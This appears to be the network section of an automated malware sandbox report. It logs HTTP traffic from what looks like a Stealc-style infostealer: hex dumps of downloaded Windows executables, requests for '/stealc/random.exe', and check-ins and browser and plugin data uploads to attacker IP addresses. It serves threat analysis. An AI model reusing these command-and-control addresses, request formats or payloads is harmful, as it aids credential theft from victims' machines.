Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 11:49:30 GMTContent-Type: application/octet-streamContent-Length: 1878528Last-Modified: Fri, 26 Jul 2024 11:17:18 GMTConnection: keep-aliveETag: "66a385be-1caa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 78 aa 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 9c 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 9c 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 66 61 62 66 71 6f 65 00 90 19 00 00 10 31 00 00 90 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 78 76 64 77 61 69 74 00 10 00 00 00 a0 4a 00 00 04 00 00 00 84 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 88 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 11:49:33 GMTContent-Type: application/octet-streamContent-Length: 1870848Last-Modified: Fri, 26 Jul 2024 11:16:43 GMTConnection: keep-aliveETag: "66a3859b-1c8c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 a0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 cd 42 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 82 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 81 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 78 61 6a 77 6c 6e 70 00 80 19 00 00 10 31 00 00 74 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 70 69 63 79 63 75 00 10 00 00 00 90 4a 00 00 04 00 00 00 66 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 4a 00 00 22 00 00 00 6a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: /APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENX7wUC+MYl+R+dP6Ge+Ps/gAK2S4rAvLsS9lNlstWnrY2Ovw6/QYWUW40yWi3W2oq2TgmfD/F4rhcGc/Q3kxTRWn1J3nPhOAny4YuIpbKp/JxVo2IKfr0u2Ob+Xasi+8kVvlgcJFM/02j6m9rZf8SsufBGSnZuCNcAMbSRQwAt9ttIddTRQ/7dkFG7ZzhfDKlscCwPqu8roSfIr2wEDw126PJnTg8kgpdZV8FhO09Z9yZkJbvNRCuX40AaiKTP7/kep+t5XHG1Tp05wc6bODUUz8SiWkHpg7isRn5nplH5Pwj6qy8wfjiPn8r9T6Iz9u6hFIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1721994783452Host: self.events.data.microsoft.comContent-Length: 7973Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 31 44 41 37 38 35 35 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 2d 2d 0d 0a Data Ascii: ------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="hwid"8DA1DA7855D72284582127------BAKFBKEHDBGHJJKFIEGDContent-Disposition: form-data; name="build"sila------BAKFBKEHDBGHJJKFIEGD--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 2d 2d 0d 0a Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="message"browsers------DBGHJEBKJEGHJKECAAKJ--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJJJEBGDAFHJEBGDGIJDHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 4a 45 42 47 44 41 46 48 4a 45 42 47 44 47 49 4a 44 2d 2d 0d 0a Data Ascii: ------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------JJJJEBGDAFHJEBGDGIJDContent-Disposition: form-data; name="message"plugins------JJJJEBGDAFHJEBGDGIJD--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JECBGCFHCFIDHIDHDGDGHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 63 33 33 38 33 35 33 34 37 38 32 30 31 65 30 31 39 32 66 66 32 61 62 65 63 62 65 66 37 39 39 32 61 33 64 30 33 30 34 65 62 35 35 30 66 39 32 33 36 36 65 65 64 33 33 65 65 63 34 31 30 65 66 66 65 34 34 31 34 32 63 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 43 42 47 43 46 48 43 46 49 44 48 49 44 48 44 47 44 47 2d 2d 0d 0a Data Ascii: ------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="token"ec338353478201e0192ff2abecbef7992a3d0304eb550f92366eed33eec410effe44142c------JECBGCFHCFIDHIDHDGDGContent-Disposition: form-data; name="message"fplugins------JECBGCFHCFIDHIDHDGDG--
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000003002&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEGHost: 85.28.47.31Content-Length: 7883Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 33 30 30 32 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000003002&unit=246122658369
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
